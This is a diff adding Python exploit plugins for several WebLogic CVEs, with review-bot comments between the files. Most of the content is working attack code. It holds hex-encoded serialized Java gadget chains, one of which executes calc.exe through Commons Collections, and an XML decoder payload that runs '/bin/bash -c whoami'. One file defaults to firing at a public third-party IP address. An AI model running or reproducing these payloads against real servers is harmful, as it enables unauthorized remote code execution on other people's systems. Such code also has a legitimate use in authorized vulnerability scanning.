unhexlify(s1 + s2) + + chunk1 = '\x00\x00' + len_hex + 
'\x01\x65\x01\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x71\x00\x00\xea\x60\x00\x00\x00\x18\x43\x2e\xc6\xa2\xa6\x39\x85\xb5\xaf\x7d\x63\xe6\x43\x83\xf4\x2a\x6d\x92\xc9\xe9\xaf\x0f\x94\x72\x02\x79\x73\x72\x00\x78\x72\x01\x78\x72\x02\x78\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x70\x70\x70\x70\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x06\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x03\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x03\x78\x70\x77\x02\x00\x00\x78\xfe\x01\x00\x00' + + + payload = chunk1 + chunk2 + chunk3 + + + payload = "{0}{1}".format(struct.pack('!i', len(payload)), payload[4:]) + + sock.send(payload) + response = sock.recv(15000) + print(("[*]测试返回内容为{}".format(response))) + +if __name__ == '__main__': + run('127.0.0.1',7001) \ No newline at end of file diff --git a/plugins/weblogic_poc/CVE_2016_0638.py b/plugins/weblogic_poc/CVE_2016_0638.py new file mode 100644 index 0000000..4a17445 --- /dev/null +++ b/plugins/weblogic_poc/CVE_2016_0638.py 
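Review bot: `run` opens the socket without `settimeout` and never closes it, so a silent port hangs the caller and the descriptor leaks; the sibling files in `plugins/weblogic_poc` set `sock.settimeout(10)`, and the socket should be released in a `finally:` block. The length prefix is rebuilt with `"{0}{1}".format(struct.pack('!i', len(payload)), payload[4:])`, which produces raw bytes only on Python 2 — on Python 3 the repr of the bytes object is interpolated as text — while `print((...))` looks 2to3-converted, so the supported interpreter should be stated in the header docstring. The response is printed verbatim rather than matched against a signature as `checkVul` does in the neighbouring files, so this plugin yields no vulnerable/not-vulnerable verdict. The bytes in `chunk2` also appear to encode a fixed OS command rather than a benign marker, which makes this a code-execution test rather than a detection-only check; that scope should be documented at the top of the file.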
@@ -0,0 +1,68 @@ +#!/usr/bin/env python +# _*_ coding:utf-8 _*_ +''' + ____ _ _ _ _ __ __ _ +| _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ +| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / +| _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < +|_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ + +''' +import socket +import time +import re + +VUL=['CVE-2016-0638'] +PAYLOAD=['aced0005737200257765626c6f6769632e6a6d732e636f6d6d6f6e2e53747265616d4d657373616765496d706c6b88de4d93cbd45d0c00007872001f7765626c6f6769632e6a6d732e636f6d6d6f6e2e4d657373616765496d706c69126161d04df1420c000078707a000003f728200000000000000100000578aced00057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e747400124c6a6176612f6c616e672f4f626a6563743b7870737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b0200007870000000014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707371007e00007372002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d83418990200007870000000057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e747400124c6a6176612f6c616e672f4f626a6563743b7870767200116a6176612e6c616e672e527
56e74696d65000000000000000000000078707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000274000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a990200007870000000007400096765744d6574686f647571007e001e00000002767200106a61767a0000018e612e6c616e672e537472696e67a0f0a4387a3bb34202000078707671007e001e7371007e00167571007e001b00000002707571007e001b00000000740006696e766f6b657571007e001e00000002767200106a6176612e6c616e672e4f626a656374000000000000000000000078707671007e001b7371007e0016757200135b4c6a6176612e6c616e672e537472696e673badd256e7e91d7b4702000078700000000174000863616c632e657865740004657865637571007e001e0000000171007e00237371007e0011737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b020000787000000001737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f40000000000010770800000010000000007878767200126a6176612e6c616e672e4f766572726964650000000000000000000000787071007e003a78','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','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'] +VER_SIG=['weblogic.jms.common.StreamMessageImpl'] +def t3handshake(sock,server_addr): + sock.connect(server_addr) + sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex')) + time.sleep(1) + sock.recv(1024) + # print 'handshake successful' +def buildT3RequestObject(sock,rport): + data1 = 
'000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e6
66f972245516452463e0200035b00087061636b6167657371' + data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(rport)) + data3 = '1a7727000d3234322e323134' + data4 = '2e312e32353461863d1d0000000078' + for d in [data1,data2,data3,data4]: + sock.send(d.decode('hex')) + time.sleep(2) + # print 'send request payload successful,recv length:%d'%(len(sock.recv(2048))) +def sendEvilObjData(sock,data): + payload='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' + payload+=data + payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff' + payload = '%s%s'%('{:08x}'.format(len(payload)/2 + 4),payload) + sock.send(payload.decode('hex')) + res = '' + try: + while True: + res += sock.recv(4096) + time.sleep(0.1) + except Exception as e: + pass + 
return res +def checkVul(res,server_addr,index): + p=re.findall(VER_SIG[index], res, re.S) + if len(p)>0: + # print '%s:%d is vul %s'%(server_addr[0],server_addr[1],VUL[index]) + print(('[+]目标weblogic存在JAVA反序列化漏洞:{}'.format(VUL[index]))) + else: + # print '%s:%d is not vul %s' % (server_addr[0],server_addr[1],VUL[index]) + print(('[-]目标weblogic未检测到{}'.format(VUL[index]))) +def run(rip,rport,index): + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + ##打了补丁之后,会阻塞,所以设置超时时间,默认15s,根据情况自己调整 + sock.settimeout(10) + server_addr = (rip, rport) + t3handshake(sock,server_addr) + buildT3RequestObject(sock,rport) + rs=sendEvilObjData(sock,PAYLOAD[index]) + checkVul(rs,server_addr,index) + +if __name__=="__main__": + rip = '222.85.76.240' + rport = 80 + run(rip,rport,0) \ No newline at end of file diff --git a/plugins/weblogic_poc/CVE_2016_3510.py b/plugins/weblogic_poc/CVE_2016_3510.py new file mode 100644 index 0000000..8813f5a --- /dev/null +++ b/plugins/weblogic_poc/CVE_2016_3510.py 
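Review bot: The `__main__` block defaults to `rip = '222.85.76.240'` and `rport = 80`, a public address, so running the file with no arguments sends the payload to a third-party host; the sibling files use `'127.0.0.1'` and `7001`, and this one should match. In `sendEvilObjData` the `except Exception as e: pass` around the receive loop also swallows refused connections and resets, after which `checkVul` reports the target as not vulnerable — a false negative indistinguishable from a clean result; catching `socket.timeout` only and letting other errors propagate (or returning a distinct status) would fix this, and the same pattern appears in `CVE_2016_3510.py` and `CVE_2017_3248.py`. The file mixes Python 2 and 3 idioms (`'...'.decode('hex')` and `len(payload)/2` inside `'{:08x}'.format` work only on Python 2, while `print((...))` suggests a 2to3 pass), so the supported interpreter should be stated in the header docstring. The socket created in `run` is never closed; a `finally: sock.close()` is the minimal fix.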
@@ -0,0 +1,68 @@ +#!/usr/bin/env python +# _*_ coding:utf-8 _*_ +''' + ____ _ _ _ _ __ __ _ +| _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ +| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / +| _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < +|_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ + +''' +import socket +import time +import re + +VUL=['CVE-2016-3510'] +PAYLOAD=['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','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','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'] +VER_SIG=['org.apache.commons.collections.functors.InvokerTransformer'] +def t3handshake(sock,server_addr): + sock.connect(server_addr) + sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex')) + time.sleep(1) + sock.recv(1024) + # print 'handshake successful' +def buildT3RequestObject(sock,rport): + data1 = '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' + data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(rport)) + data3 = '1a7727000d3234322e323134' + data4 = '2e312e32353461863d1d0000000078' + for d in [data1,data2,data3,data4]: + sock.send(d.decode('hex')) + 
time.sleep(2) + # print 'send request payload successful,recv length:%d'%(len(sock.recv(2048))) +def sendEvilObjData(sock,data): + payload='056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000' + payload+=data + payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff' + payload = '%s%s'%('{:08x}'.format(len(payload)/2 + 4),payload) + sock.send(payload.decode('hex')) + res = '' + try: + while True: + res += sock.recv(4096) + time.sleep(0.1) + except Exception as e: + pass + return res +def checkVul(res,server_addr,index): + p=re.findall(VER_SIG[index], res, re.S) + if len(p)>0: + # print '%s:%d is vul %s'%(server_addr[0],server_addr[1],VUL[index]) + print(('[+]目标weblogic存在JAVA反序列化漏洞:{}'.format(VUL[index]))) + else: + # print '%s:%d is not vul %s' % 
(server_addr[0],server_addr[1],VUL[index]) + print(('[-]目标weblogic未检测到{}'.format(VUL[index]))) +def run(rip,rport,index): + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + ##打了补丁之后,会阻塞,所以设置超时时间,默认15s,根据情况自己调整 + sock.settimeout(10) + server_addr = (rip, rport) + t3handshake(sock,server_addr) + buildT3RequestObject(sock,rport) + rs=sendEvilObjData(sock,PAYLOAD[index]) + checkVul(rs,server_addr,index) + +if __name__=="__main__": + rip = '127.0.0.1' + rport = 7001 + run(rip,rport,0) \ No newline at end of file diff --git a/plugins/weblogic_poc/CVE_2017_3248.py b/plugins/weblogic_poc/CVE_2017_3248.py new file mode 100644 index 0000000..c9d5149 --- /dev/null +++ b/plugins/weblogic_poc/CVE_2017_3248.py 
@@ -0,0 +1,68 @@ +#!/usr/bin/env python +# _*_ coding:utf-8 _*_ +''' + ____ _ _ _ _ __ __ _ +| _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ +| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / +| _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < +|_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ + +''' +import socket +import time +import re + +VUL=['CVE-2017-3248'] +PAYLOAD=['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','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','aced0005737d00000001001a6a6176612e726d692e72656769737472792e5265676973747279787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707732000a556e696361737452656600093132372e302e302e3100000000000000006ed6d97b00000000000000000000000000000078'] +VER_SIG=['\\$Proxy[0-9]+'] +def t3handshake(sock,server_addr): + sock.connect(server_addr) + sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex')) + time.sleep(1) + sock.recv(1024) + # print 'handshake successful' +def buildT3RequestObject(sock,rport): + data1 = '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' + data2 = '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{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(rport)) + data3 = '1a7727000d3234322e323134' + data4 = '2e312e32353461863d1d0000000078' + for d in [data1,data2,data3,data4]: + sock.send(d.decode('hex')) + time.sleep(2) + # print 'send request payload successful,recv length:%d'%(len(sock.recv(2048))) +def sendEvilObjData(sock,data): + 
payload='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' + payload+=data + payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff' + payload = '%s%s'%('{:08x}'.format(len(payload)/2 + 4),payload) + sock.send(payload.decode('hex')) + res = '' + try: + while True: + res += sock.recv(4096) + time.sleep(0.1) + except Exception as e: + pass + return res +def checkVul(res,server_addr,index): + p=re.findall(VER_SIG[index], res, re.S) + if len(p)>0: + # print '%s:%d is vul %s'%(server_addr[0],server_addr[1],VUL[index]) + print(('[+]目标weblogic存在JAVA反序列化漏洞:{}'.format(VUL[index]))) + else: + # print '%s:%d is not vul %s' % (server_addr[0],server_addr[1],VUL[index]) + print(('[-]目标weblogic未检测到{}'.format(VUL[index]))) +def run(rip,rport,index): + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + ##打了补丁之后,会阻塞,所以设置超时时间,默认15s,根据情况自己调整 + sock.settimeout(10) + server_addr = (rip, rport) + t3handshake(sock,server_addr) + buildT3RequestObject(sock,rport) + rs=sendEvilObjData(sock,PAYLOAD[index]) + checkVul(rs,server_addr,index) + +if __name__=="__main__": + rip = '127.0.0.1' + rport = 7001 + run(rip,rport,0) \ No newline at end of file diff --git a/plugins/weblogic_poc/CVE_2017_3506.py b/plugins/weblogic_poc/CVE_2017_3506.py new file mode 100644 index 0000000..1b2fc62 --- /dev/null +++ b/plugins/weblogic_poc/CVE_2017_3506.py 
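Review bot: The socket opened in `run` is never closed: `t3handshake` connects it and nothing in `run` or `sendEvilObjData` releases it on success or on failure, so a dispatcher that calls these modules in a loop leaks one descriptor per probe. The read loop in `sendEvilObjData` also terminates only by catching every exception with `except Exception as e: pass`, which hides a connection reset behind the same empty result as a clean timeout and leaves `e` unused. Wrapping the body of `run` in `with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:` (or a `try/finally: sock.close()`) fixes the leak, and the loop should narrow to `except socket.timeout:` so other errors surface to the caller. The same pattern recurs in the CVE_2018_2628.py and CVE_2018_2893.py hunks below, and appears to be in the hunk cut off above this one, whose start is outside this view.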
@@ -0,0 +1,72 @@ +#!/usr/bin/env python +# _*_ coding:utf-8 _*_ +''' + ____ _ _ _ _ __ __ _ +| _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ +| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / +| _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < +|_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ + +''' +import requests +import re +from sys import argv + +heads = { + 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0', + 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', + 'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3', + 'Content-Type': 'text/xml;charset=UTF-8' + } + +def poc(url): + if not url.startswith("http"): + url = "http://" + url + if "/" in url: + url += '/wls-wsat/CoordinatorPortType' + post_str = ''' + + + + + + + + /bin/bash + + + -c + + + whoami + + + + + + + + + + ''' + + try: + response = requests.post(url, data=post_str, verify=False, timeout=5, headers=heads) + response = response.text + response = re.search(r"\.*\<\/faultstring\>", response).group(0) + except Exception as e: + response = "" + + if 'java.lang.ProcessBuilder' in response or "0" in response: + result = '[+]目标weblogic存在JAVA反序列化漏洞:CVE-2017-3506' + return result + else: + result = '[-]目标weblogic未检测到CVE-2017-3506' + return result +def run(rip,rport): + url=rip+':'+str(rport) + result = poc(url=url) + print(result) + +if __name__ == '__main__': + run('127.0.0.1',7001) \ No newline at end of file diff --git a/plugins/weblogic_poc/CVE_2018_2628.py b/plugins/weblogic_poc/CVE_2018_2628.py new file mode 100644 index 0000000..1f7c360 --- /dev/null +++ b/plugins/weblogic_poc/CVE_2018_2628.py 
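Review bot: The `if "/" in url:` guard in `poc` is vacuous — after the `http://` prefix is ensured the string always contains a slash — so the `/wls-wsat/CoordinatorPortType` suffix is appended unconditionally and a caller that already passes that path gets it doubled; test the path instead, e.g. `if not url.rstrip('/').endswith('/wls-wsat/CoordinatorPortType'):`. `requests.post(..., verify=False)` silently disables certificate validation for any https target; that should be a documented, explicit option rather than the default. The final check `'java.lang.ProcessBuilder' in response or "0" in response` treats any faultstring containing the digit 0 as a positive, so the reported result is unreliable. `from sys import argv` is unused; `argv` never appears in the file.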
@@ -0,0 +1,80 @@ +#!/usr/bin/env python +# _*_ coding:utf-8 _*_ +''' + ____ _ _ _ _ __ __ _ +| _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ +| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / +| _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < +|_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ + +''' +import socket +import sys +import time +import re + + +VUL=['CVE-2018-2628'] +PAYLOAD=['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'] +VER_SIG=['\\$Proxy[0-9]+'] + +def t3handshake(sock,server_addr): + sock.connect(server_addr) + sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex')) + time.sleep(1) + sock.recv(1024) + # print 'handshake successful' + +def buildT3RequestObject(sock,dport): + data1 = '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' + data2 = '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{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(dport)) + data3 = '1a7727000d3234322e323134' + data4 = '2e312e32353461863d1d0000000078' + for d in [data1,data2,data3,data4]: + sock.send(d.decode('hex')) + time.sleep(2) + # print 'send request payload successful,recv length:%d'%(len(sock.recv(2048))) + + +def sendEvilObjData(sock,data): + payload='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' + payload+=data + payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff' + payload = '%s%s'%('{:08x}'.format(len(payload)/2 + 4),payload) + 
sock.send(payload.decode('hex')) + time.sleep(2) + sock.send(payload.decode('hex')) + res = '' + try: + while True: + res += sock.recv(4096) + time.sleep(0.1) + except Exception as e: + pass + return res + +def checkVul(res,server_addr,index): + p=re.findall(VER_SIG[index], res, re.S) + if len(p)>0: + # print '%s:%d is vul %s'%(server_addr[0],server_addr[1],VUL[index]) + print(('[+]目标weblogic存在JAVA反序列化漏洞:{}'.format(VUL[index]))) + else: + # print '%s:%d is not vul %s' % (server_addr[0],server_addr[1],VUL[index]) + print(('[-]目标weblogic未检测到{}'.format(VUL[index]))) + +def run(dip,dport,index): + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + ##打了补丁之后,会阻塞,所以设置超时时间,默认15s,根据情况自己调整 + sock.settimeout(10) + server_addr = (dip, dport) + t3handshake(sock,server_addr) + buildT3RequestObject(sock,dport) + rs=sendEvilObjData(sock,PAYLOAD[index]) + # print 'rs',rs + checkVul(rs,server_addr,index) + + +if __name__=="__main__": + dip = sys.argv[1] + dport = int(sys.argv[2]) + run(dip,dport,0) \ No newline at end of file diff --git a/plugins/weblogic_poc/CVE_2018_2893.py b/plugins/weblogic_poc/CVE_2018_2893.py new file mode 100644 index 0000000..04a978a --- /dev/null +++ b/plugins/weblogic_poc/CVE_2018_2893.py 
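Review bot: `sendEvilObjData` sends the same payload twice with a `time.sleep(2)` between the two `sock.send` calls and nothing says why; if the repeat is intentional it needs a comment explaining the reason, otherwise the second send should go. `checkVul` takes `server_addr` but never reads it since the lines that used it are commented out, and `# print 'rs',rs` in `run` is dead code; drop both, or keep the parameter only for call-site compatibility with a comment saying so. The same unused `server_addr` parameter is in the CVE_2017_3248.py hunk above and the CVE_2018_2893.py hunk below.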
@@ -0,0 +1,85 @@ +#!/usr/bin/env python +# _*_ coding:utf-8 _*_ +''' + ____ _ _ _ _ __ __ _ +| _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ +| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / +| _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < +|_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ + +''' +import socket +import time +import re +import sys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treamMessageImpl'] + +def t3handshake(sock,server_addr): + sock.connect(server_addr) + sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex')) + time.sleep(1) + data = sock.recv(1024) + + +def buildT3RequestObject(sock,port): + data1 = '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' + data2 = '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{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(port)) + data3 = '1a7727000d3234322e323134' + data4 = '2e312e32353461863d1d0000000078' + for d in [data1,data2,data3,data4]: + sock.send(d.decode('hex')) + time.sleep(2) + + + +def sendEvilObjData(sock,data): + payload='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' + payload+=data + 